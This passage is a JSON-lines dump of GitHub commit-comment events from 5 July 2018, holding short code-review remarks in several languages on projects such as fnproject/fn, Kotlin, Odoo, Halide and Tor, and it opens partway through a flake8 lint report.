bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T09:15:21Z"}
{"id":"7921958988","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29603601,"position":1,"line":1,"path":"docs/developers/triggers.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T09:15:26Z","updated_at":"2018-07-05T09:15:26Z","author_association":"CONTRIBUTOR","body":"yeah, i'll probably just delete it"}},"created_at":"2018-07-05T09:15:26Z"}
{"id":"7921959094","type":"CommitCommentEvent","actor":{"login":"vfxholic"},"repo":{"name":"vfxholic/kakao-clone"},"payload":{"comment":{"id":29603602,"position":8,"line":8,"path":"contect-me.html","commit_id":"5399b056749b40c942cd6657a259821745d9f456","created_at":"2018-07-05T09:15:27Z","updated_at":"2018-07-05T09:15:27Z","author_association":"OWNER","body":"this line ls css link! so easy so easy right? \r\n\r\nonly one line command! \r\nover coding!"}},"created_at":"2018-07-05T09:15:27Z"}
{"id":"7921963577","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29603609,"position":6,"line":25,"path":"lecture2/src/main/java/otus/springframework/homework/lecture2/com/service/Main.java","commit_id":"6b092c30c0890f3b021c7c7999d376213b83e8f0","created_at":"2018-07-05T09:16:18Z","updated_at":"2018-07-05T09:16:18Z","author_association":"NONE","body":"ЛУчше"}},"created_at":"2018-07-05T09:16:18Z"}
{"id":"7921964573","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29603610,"position":87,"line":80,"path":"lecture2/src/main/java/otus/springframework/homework/lecture2/com/service/application/SurveyServiceImpl.java","commit_id":"6b092c30c0890f3b021c7c7999d376213b83e8f0","created_at":"2018-07-05T09:16:30Z","updated_at":"2018-07-05T09:16:30Z","author_association":"NONE","body":"Я бы всё ранво бы желала это циклом."}},"created_at":"2018-07-05T09:16:30Z"}
{"id":"7921966353","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29603612,"position":16,"line":54,"path":"BZOJ/2751.cpp","commit_id":"a6394338cc801454661b0878f14a359e7b510613","created_at":"2018-07-05T09:16:49Z","updated_at":"2018-07-05T09:16:49Z","author_association":"CONTRIBUTOR","body":"三目运算符的最后一目如果有运算，不管优先级大小都建议带上括号，比如这样：`ans=ans*(dy-tp<0?dy-tp+ha:(dy-tp))%ha;`，这样比较稳，可以explicitly说明这个运算就是在三目运算内而不是手误没给三目运算符加括号。"}},"created_at":"2018-07-05T09:16:49Z"}
{"id":"7921967418","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29603618,"position":87,"line":80,"path":"lecture2/src/main/java/otus/springframework/homework/lecture2/com/service/application/SurveyServiceImpl.java","commit_id":"6b092c30c0890f3b021c7c7999d376213b83e8f0","created_at":"2018-07-05T09:17:01Z","updated_at":"2018-07-05T09:17:01Z","author_association":"NONE","body":"А вместо get - был бы по индексу. Всё-таки циклы позволяют это сделать)"}},"created_at":"2018-07-05T09:17:01Z"}
{"id":"7921968704","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29603621,"position":71,"line":65,"path":"lecture2/src/main/java/otus/springframework/homework/lecture2/com/service/application/SurveyServiceImpl.java","commit_id":"6b092c30c0890f3b021c7c7999d376213b83e8f0","created_at":"2018-07-05T09:17:15Z","updated_at":"2018-07-05T09:17:15Z","author_association":"NONE","body":"Когд анет параметров - можно null просто передавать."}},"created_at":"2018-07-05T09:17:15Z"}
{"id":"7921971395","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29603630,"position":39,"line":31,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T09:17:44Z","updated_at":"2018-07-05T09:17:44Z","author_association":"CONTRIBUTOR","body":"It can, it adds a step to the demarshalling (change the map of triggers into list of triggers moving the keys in as 'name'), so i did it like this. It also makes it easier to describe the fields laid out this way.\r\n\r\nBasically, it's easier to use like this."}},"created_at":"2018-07-05T09:17:44Z"}
{"id":"7921978358","type":"CommitCommentEvent","actor":{"login":"skymandr"},"repo":{"name":"teeseng/teeseng.github.io"},"payload":{"comment":{"id":29603645,"position":15,"line":51,"path":"index.html","commit_id":"025595f455cb8120b1f5f0cd606a391d8f386c47","created_at":"2018-07-05T09:19:04Z","updated_at":"2018-07-05T09:19:04Z","author_association":"NONE","body":"The best bird! ^^"}},"created_at":"2018-07-05T09:19:04Z"}
{"id":"7921979850","type":"CommitCommentEvent","actor":{"login":"wuhardygithub"},"repo":{"name":"wuhardygithub/JavaSE"},"payload":{"comment":{"id":29603647,"position":null,"line":null,"path":null,"commit_id":"bbe8f2d71fe0bca4166a490c8a166a2e2df29b79","created_at":"2018-07-05T09:19:20Z","updated_at":"2018-07-05T09:19:20Z","author_association":"OWNER","body":"ViewDB.java"}},"created_at":"2018-07-05T09:19:20Z"}
{"id":"7921980362","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29603648,"position":6,"line":818,"path":"addons/web/static/src/js/views/basic/basic_model.js","commit_id":"1ce58b26cfaadca755a3c7ce6b2b934daa7d2ad8","created_at":"2018-07-05T09:19:26Z","updated_at":"2018-07-05T09:19:26Z","author_association":"NONE","body":"one reload operation active"}},"created_at":"2018-07-05T09:19:26Z"}
{"id":"7921981553","type":"CommitCommentEvent","actor":{"login":"Richajain1007"},"repo":{"name":"Richajain1007/First-Repo"},"payload":{"comment":{"id":29603651,"position":null,"line":null,"path":null,"commit_id":"b7533efee8e16af4e2b4b4631771eb5c4b99c1b4","created_at":"2018-07-05T09:19:39Z","updated_at":"2018-07-05T09:19:39Z","author_association":"OWNER","body":"accepted"}},"created_at":"2018-07-05T09:19:39Z"}
{"id":"7921982612","type":"CommitCommentEvent","actor":{"login":"sathishcst10"},"repo":{"name":"sathishcst10/Angular-Hello-World"},"payload":{"comment":{"id":29603653,"position":null,"line":null,"path":null,"commit_id":"a45a3223005c81c10f4ece03fd9a915abdaa8237","created_at":"2018-07-05T09:19:51Z","updated_at":"2018-07-05T09:19:51Z","author_association":"OWNER","body":"first"}},"created_at":"2018-07-05T09:19:51Z"}
{"id":"7921982703","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29603654,"position":9,"line":4439,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"42d0bbc8798bceffb8cac5214704a791fc295b94","created_at":"2018-07-05T09:19:52Z","updated_at":"2018-07-05T09:19:52Z","author_association":"MEMBER","body":"Value should be boxed before passing it to `checkcast` function, so everything should work correctly, because we perform cast to the boxed type. I'll check"}},"created_at":"2018-07-05T09:19:52Z"}
{"id":"7921988494","type":"CommitCommentEvent","actor":{"login":"vladmihalcea"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29603669,"position":null,"line":null,"path":null,"commit_id":"5b40dfca26b600973216523417562c1c09e53b7f","created_at":"2018-07-05T09:20:55Z","updated_at":"2018-07-05T09:20:55Z","author_association":"MEMBER","body":"Fixed."}},"created_at":"2018-07-05T09:20:55Z"}
{"id":"7921991366","type":"CommitCommentEvent","actor":{"login":"theKashey"},"repo":{"name":"theKashey/beautiful-react-redux"},"payload":{"comment":{"id":29603672,"position":10,"line":7,"path":"src/patch.js","commit_id":"c8617322ae2af596147207036c503a50dfbd132b","created_at":"2018-07-05T09:21:27Z","updated_at":"2018-07-05T09:21:27Z","author_association":"OWNER","body":"It depends on webpack version, but in short - webpack is not allowing to override named exports, decorating them with \"getters\" without setters."}},"created_at":"2018-07-05T09:21:27Z"}
{"id":"7921992740","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29603675,"position":14,"line":3595,"path":"addons/web/static/tests/views/kanban_tests.js","commit_id":"1ce58b26cfaadca755a3c7ce6b2b934daa7d2ad8","created_at":"2018-07-05T09:21:43Z","updated_at":"2018-07-05T09:21:43Z","author_association":"NONE","body":"i do not see the value in extracting this function. I think that you should have something like:\r\n\r\nvar isFirstUpdate = ...;\r\nif (isFirstUpdate) {\r\n  ...\r\n}\r\n\r\nin the mockrppc method."}},"created_at":"2018-07-05T09:21:43Z"}
{"id":"7921993600","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29603679,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T09:21:53Z","updated_at":"2018-07-05T09:21:53Z","author_association":"CONTRIBUTOR","body":"I'll change it to '1'. We didn't have an api version before, so whose counting!"}},"created_at":"2018-07-05T09:21:53Z"}
{"id":"7921993954","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29603680,"position":32,"line":3613,"path":"addons/web/static/tests/views/kanban_tests.js","commit_id":"1ce58b26cfaadca755a3c7ce6b2b934daa7d2ad8","created_at":"2018-07-05T09:21:57Z","updated_at":"2018-07-05T09:21:57Z","author_association":"NONE","body":"res => result"}},"created_at":"2018-07-05T09:21:57Z"}
{"id":"7921994392","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29603682,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T09:22:02Z","updated_at":"2018-07-05T09:22:02Z","author_association":"NONE","body":"For convention mapping there is now [lazy configuration](https://docs.gradle.org/current/userguide/lazy_configuration.html).\r\n\r\nRegarding making `files` final: You still have your convenience `files()` method, that doesn't have to go away. Anyway, your call."}},"created_at":"2018-07-05T09:22:02Z"}
{"id":"7921996106","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29603685,"position":55,"line":3636,"path":"addons/web/static/tests/views/kanban_tests.js","commit_id":"1ce58b26cfaadca755a3c7ce6b2b934daa7d2ad8","created_at":"2018-07-05T09:22:22Z","updated_at":"2018-07-05T09:22:22Z","author_association":"NONE","body":"why is there a reload here?"}},"created_at":"2018-07-05T09:22:22Z"}
{"id":"7921997039","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29603688,"position":9,"line":4439,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"42d0bbc8798bceffb8cac5214704a791fc295b94","created_at":"2018-07-05T09:22:32Z","updated_at":"2018-07-05T09:22:32Z","author_association":"MEMBER","body":"Please, check for `is` as well"}},"created_at":"2018-07-05T09:22:32Z"}
{"id":"7921998320","type":"CommitCommentEvent","actor":{"login":"kirkkala"},"repo":{"name":"wunderio/client-UK-FSA-beta"},"payload":{"comment":{"id":29603691,"position":null,"line":null,"path":null,"commit_id":"394fc694b68da5b6fd695e8e051f9e4bd38045ab","created_at":"2018-07-05T09:22:46Z","updated_at":"2018-07-05T09:22:46Z","author_association":"COLLABORATOR","body":"Was caused by 20e03c82d50f963452b311082fcce711c5343fc6"}},"created_at":"2018-07-05T09:22:46Z"}
{"id":"7921998740","type":"CommitCommentEvent","actor":{"login":"conory"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29603693,"position":null,"line":null,"path":null,"commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T09:22:51Z","updated_at":"2018-07-05T09:22:51Z","author_association":"MEMBER","body":"음... '확장성 대 호환성'의 문제로군요. 근데 저도 라이믹스 이전부터 필요하다고 느꼈던 기능이라...\r\n어차피 [호환성 따위는 전혀 고려하지 않은 이런 서드파티](https://www.xpressengine.com/index.php?mid=download&package_id=19433415)도 있는 상태라...\r\n\r\n향후 서드파티 호환성이 문제라면 코어에서 공통 파일을 통제하는 것이 바람직하다고 생각됩니다. 파일(또는 파일'들')에 고정된 이름(별칭)을 붙인다던지 하는..."}},"created_at":"2018-07-05T09:22:51Z"}
{"id":"7922000009","type":"CommitCommentEvent","actor":{"login":"pm47"},"repo":{"name":"ACINQ/eclair"},"payload":{"comment":{"id":29603696,"position":23,"line":820,"path":"eclair-core/src/main/scala/fr/acinq/eclair/channel/Channel.scala","commit_id":"b7b9f4929aedf38347bf522b248c7c79af520a38","created_at":"2018-07-05T09:23:07Z","updated_at":"2018-07-05T09:23:07Z","author_association":"MEMBER","body":"They can't be equal because those announcements are timestamped, besides this commit adds a specific test making sure we do indeed send a new announcement when receiving a `TickRefreshChannelUpdate` (this test didn't pass before, so we did have the \"node fading away\" issue)."}},"created_at":"2018-07-05T09:23:07Z"}
{"id":"7922000333","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29603698,"position":null,"line":null,"path":null,"commit_id":"2473ea1407b2add7108fc5ff52f384384d55cc75","created_at":"2018-07-05T09:23:10Z","updated_at":"2018-07-05T09:23:10Z","author_association":"MEMBER","body":"Would've gone with green checkmarks in that table :)"}},"created_at":"2018-07-05T09:23:10Z"}
{"id":"7922003018","type":"CommitCommentEvent","actor":{"login":"rnostream"},"repo":{"name":"IBMStreams/streamsx.iot"},"payload":{"comment":{"id":29603706,"position":null,"line":null,"path":null,"commit_id":"35e50216b6972d72bcca55183806dd5333529c1a","created_at":"2018-07-05T09:23:41Z","updated_at":"2018-07-05T09:23:41Z","author_association":"CONTRIBUTOR","body":"To generate complete ISO8601 time string (with ms) in the tests as they exists at moment one need to generate a timestamp (long) which includes ms. \r\n\r\nTime handling for topology part needs to be reviewed separately in an issue, #81 . It seems to be inconsistent.\r\nOnly relevant for topology part of the toolkit not SPL part!\r\n"}},"created_at":"2018-07-05T09:23:41Z"}
{"id":"7922003113","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29603707,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T09:23:42Z","updated_at":"2018-07-05T09:23:42Z","author_association":"CONTRIBUTOR","body":"This is attempting to be the schema of the fn.yaml. 'triggers' is optional.\r\n\r\nIt's looking more like the new fn file would be a subset of the current func.yml, not sure where it's completely breaking the current file. It's pretty much just dropping things that have been removed and making the 'path' optional, moving it into triggers.\r\n\r\nThis should make a migration easy to perform."}},"created_at":"2018-07-05T09:23:42Z"}
{"id":"7922008801","type":"CommitCommentEvent","actor":{"login":"FomalHautCS"},"repo":{"name":"minuku/minuku-web-dashboard"},"payload":{"comment":{"id":29603714,"position":null,"line":null,"path":null,"commit_id":"8f37fffc4bfb4c71201b1ce566aecd4ec0409cf8","created_at":"2018-07-05T09:24:42Z","updated_at":"2018-07-05T09:24:42Z","author_association":"COLLABORATOR","body":"it's <table> , not <test>"}},"created_at":"2018-07-05T09:24:42Z"}
{"id":"7922009452","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29603716,"position":null,"line":null,"path":null,"commit_id":"b1de1e7a77275ad3e8a65d984ff1e9779920e933","created_at":"2018-07-05T09:24:49Z","updated_at":"2018-07-05T09:24:49Z","author_association":"CONTRIBUTOR","body":"From clang-cl I get the warning:\r\n```sh\r\n../lib/container/smartlist.c(137,9):  warning: implicitly declaring library \r\nfunction 'strcasecmp' with type 'int (const char *, const char *)'     [-Wimplicit-function-declaration]\r\n    if (strcasecmp((const char*)sl->list[i],element)==0)\r\n```\r\nSo `smartlist.c` should be patched:\r\n```diff\r\n--- a/lib/container/smartlist.c 2018-07-04 19:27:39\r\n+++ b/lib/container/smartlist.c 2018-07-05 09:19:02\r\n@@ -21,6 +21,7 @@\r\n #include \"lib/defs/digest_sizes.h\"\r\n #include \"lib/ctime/di_ops.h\"\r\n #include \"lib/string/compat_ctype.h\"\r\n+#include \"lib/string/compat_string.h\"\r\n #include \"lib/string/util_string.h\"\r\n #include \"lib/string/printf.h\"\r\n```"}},"created_at":"2018-07-05T09:24:49Z"}
{"id":"7922032970","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29603762,"position":27,"line":411,"path":"tests/qgraph/test-qgraph.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-05T09:29:09Z","updated_at":"2018-07-05T09:29:09Z","author_association":"OWNER","body":"of course it did not go as I wanted, git checkout -p did not show me the tests as diff (also likely that I did not understand how to do it), ended up copying the files by hand. Luckily it was fast enough.\r\nBut I understood what you suggested, even though I wonder one could do it also without `-p` and just unstage the changes in this commit and make two commits."}},"created_at":"2018-07-05T09:29:09Z"}
{"id":"7922035365","type":"CommitCommentEvent","actor":{"login":"JohanTv"},"repo":{"name":"ricardotemoche/proyect-c-"},"payload":{"comment":{"id":29603766,"position":84,"line":84,"path":"pygame","commit_id":"5e5f8ca6753cde112f7311aff56fd810f00e3a28","created_at":"2018-07-05T09:29:35Z","updated_at":"2018-07-05T09:29:35Z","author_association":"COLLABORATOR","body":"tiempo = pygame.time.get_ticks() // 1000\r\nif tiempo % 5 == 0:\r\n    print(pygame.mouse.get_pos())"}},"created_at":"2018-07-05T09:29:35Z"}
{"id":"7922043332","type":"CommitCommentEvent","actor":{"login":"HowYouth"},"repo":{"name":"HowYouth/practice-repository"},"payload":{"comment":{"id":29603786,"position":null,"line":null,"path":null,"commit_id":"70f42dc92235d413b35bad871b0057d49e553f9b","created_at":"2018-07-05T09:31:00Z","updated_at":"2018-07-05T09:31:00Z","author_association":"OWNER","body":"更新了readMe文件，以测试如何提交代码。测试过程中无意中点到了Enter键，可以提交已经修改的内容"}},"created_at":"2018-07-05T09:31:00Z"}
{"id":"7922046312","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603789,"position":53,"line":42,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:31:26Z","updated_at":"2018-07-05T09:31:26Z","author_association":"NONE","body":"return $this->lastName;\r\nт.к. в $this->lastName уже хранится строка (function  setLastName(**string** $lastName))"}},"created_at":"2018-07-05T09:31:26Z"}
{"id":"7922051498","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603800,"position":4,"line":70,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:32:24Z","updated_at":"2018-07-05T09:32:24Z","author_association":"CONTRIBUTOR","body":"Remove line, the import is never used"}},"created_at":"2018-07-05T09:32:24Z"}
{"id":"7922053024","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603803,"position":7,"line":12,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:32:42Z","updated_at":"2018-07-05T09:32:42Z","author_association":"NONE","body":"Убери все айдишники, они пока не нужны"}},"created_at":"2018-07-05T09:32:42Z"}
{"id":"7922053717","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":29603804,"position":null,"line":null,"path":null,"commit_id":"776a2351576add09d182daf0f968a6826bb3aa56","created_at":"2018-07-05T09:32:49Z","updated_at":"2018-07-05T09:32:49Z","author_association":"NONE","body":"@mstembera Why did you programmatically limit the threads to 21 and submit the test with 32 threads? To me it looks much more naturally to simple start the test with 21 threads..."}},"created_at":"2018-07-05T09:32:49Z"}
{"id":"7922054279","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603806,"position":7,"line":12,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:32:56Z","updated_at":"2018-07-05T09:32:56Z","author_association":"NONE","body":"Убери все айдишники, они пока не нужны"}},"created_at":"2018-07-05T09:32:56Z"}
{"id":"7922057343","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29603812,"position":4,"line":1996,"path":"src/CodeGen_Hexagon.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-05T09:33:32Z","updated_at":"2018-07-05T09:33:32Z","author_association":"COLLABORATOR","body":"The overflow checking is now being done for 24 bits "}},"created_at":"2018-07-05T09:33:32Z"}
{"id":"7922058349","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603815,"position":14,"line":19,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:33:44Z","updated_at":"2018-07-05T09:33:44Z","author_association":"NONE","body":"public function __construct($lastName = \"\", $firstName = \"\", $patronimic = \"\", $avatarPath = \"\", $sign = \"\")"}},"created_at":"2018-07-05T09:33:44Z"}
{"id":"7922060801","type":"CommitCommentEvent","actor":{"login":"Niall7459"},"repo":{"name":"savonet/liquidsoap"},"payload":{"comment":{"id":29603820,"position":null,"line":null,"path":null,"commit_id":"7333b2c6397c27f848f61e6afc75e1a5a68e6efa","created_at":"2018-07-05T09:34:08Z","updated_at":"2018-07-05T09:34:08Z","author_association":"NONE","body":"And how can I also just show a plain image as video, instead of a video... and just add audio. Thanks"}},"created_at":"2018-07-05T09:34:08Z"}
{"id":"7922061021","type":"CommitCommentEvent","actor":{"login":"xinghuafei"},"repo":{"name":"xinghuafei/2sui"},"payload":{"comment":{"id":29603821,"position":null,"line":null,"path":null,"commit_id":"7d86983e253df1c4414dac23339a11597fab0d8e","created_at":"2018-07-05T09:34:10Z","updated_at":"2018-07-05T09:34:10Z","author_association":"OWNER","body":"www.2sui.com"}},"created_at":"2018-07-05T09:34:10Z"}
{"id":"7922066452","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603828,"position":23,"line":22,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:35:11Z","updated_at":"2018-07-05T09:35:11Z","author_association":"NONE","body":"Здесь нужно проверить наличие всех строк и записать свойства **объекта** с указателем $this"}},"created_at":"2018-07-05T09:35:11Z"}
{"id":"7922067222","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29603831,"position":null,"line":null,"path":null,"commit_id":"7082063d25be1f26c5eb7ea85cf9cb0f35a36886","created_at":"2018-07-05T09:35:19Z","updated_at":"2018-07-05T09:35:19Z","author_association":"COLLABORATOR","body":"Note: This commit together with #1da4715 will have to be readded in other PR for the exchange rate feature"}},"created_at":"2018-07-05T09:35:19Z"}
{"id":"7922069674","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603833,"position":15,"line":2422,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:35:46Z","updated_at":"2018-07-05T09:35:46Z","author_association":"CONTRIBUTOR","body":"Duplicated string constant. Move into for example org.folio.rest.persist.helpers.IsNotTrueHack.encoder() org.folio.rest.persist.helpers.IsNotTrueHack.decoder() ."}},"created_at":"2018-07-05T09:35:46Z"}
{"id":"7922071469","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603840,"position":24,"line":2434,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:36:06Z","updated_at":"2018-07-05T09:36:06Z","author_association":"CONTRIBUTOR","body":"Duplicated code and duplicated string constant. Move into for example org.folio.rest.persist.helpers.IsNotTrueHack.encoder() org.folio.rest.persist.helpers.IsNotTrueHack.decoder() ."}},"created_at":"2018-07-05T09:36:06Z"}
{"id":"7922071739","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29603842,"position":205,"line":154,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-05T09:36:10Z","updated_at":"2018-07-05T09:36:10Z","author_association":"COLLABORATOR","body":"Removed size as parameter "}},"created_at":"2018-07-05T09:36:10Z"}
{"id":"7922072431","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603844,"position":36,"line":2494,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:36:17Z","updated_at":"2018-07-05T09:36:17Z","author_association":"CONTRIBUTOR","body":"Duplicated code and duplicated string constant. Move into for example org.folio.rest.persist.helpers.IsNotTrueHack.encoder() org.folio.rest.persist.helpers.IsNotTrueHack.decoder() ."}},"created_at":"2018-07-05T09:36:17Z"}
{"id":"7922072769","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29603846,"position":6,"line":149,"path":"src/runtime/runtime_internal.h","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-05T09:36:20Z","updated_at":"2018-07-05T09:36:20Z","author_association":"COLLABORATOR","body":"Added the common header now. "}},"created_at":"2018-07-05T09:36:20Z"}
{"id":"7922076390","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603853,"position":24,"line":23,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:36:59Z","updated_at":"2018-07-05T09:36:59Z","author_association":"NONE","body":"Такой переменной нет в аргументах конструктора"}},"created_at":"2018-07-05T09:36:59Z"}
{"id":"7922077070","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603857,"position":25,"line":24,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:37:07Z","updated_at":"2018-07-05T09:37:07Z","author_association":"NONE","body":"Такой переменной нет в аргументах конструктора"}},"created_at":"2018-07-05T09:37:07Z"}
{"id":"7922077842","type":"CommitCommentEvent","actor":{"login":"cediazro"},"repo":{"name":"cediazro/cesardiaz"},"payload":{"comment":{"id":29603859,"position":5,"line":308,"path":"css/styles.css","commit_id":"000961e7d6e70d004f76eb657008b205a5e6285a","created_at":"2018-07-05T09:37:15Z","updated_at":"2018-07-05T09:37:15Z","author_association":"OWNER","body":"quitar la s"}},"created_at":"2018-07-05T09:37:15Z"}
